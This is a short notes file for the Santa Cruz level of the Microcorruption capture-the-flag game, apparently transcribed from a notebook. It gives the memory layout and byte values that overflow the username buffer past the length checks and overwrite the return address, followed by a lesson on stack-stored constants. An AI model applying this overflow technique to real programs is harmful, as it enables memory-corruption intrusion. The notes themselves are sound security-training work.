MicroCorruption/10-Santa Cruz/notes.md

Taken verbatim from my notebook

Page 1

Santa Cruz
    2 buffers
        username [0x63] -> 2404 -> 43a2
        password [0x63] -> 2404 -> 43b5
    r4: return addr: 43cc
    Min len stored at 43b3
        username +0x11      index 17
    Max len stored at 43b4
        username +0x12      index 18
    43c6 must be 00
     -> password must be 16 chars
        so strcpy places 00 there
     -> password: "passwordpassword"

    username[0x11] = 01
    username[0x12] = 7f
    username[0x42+]= 4a44

    Don't put important constants on the stack?
    Strcpy does copy the last null byte

    A program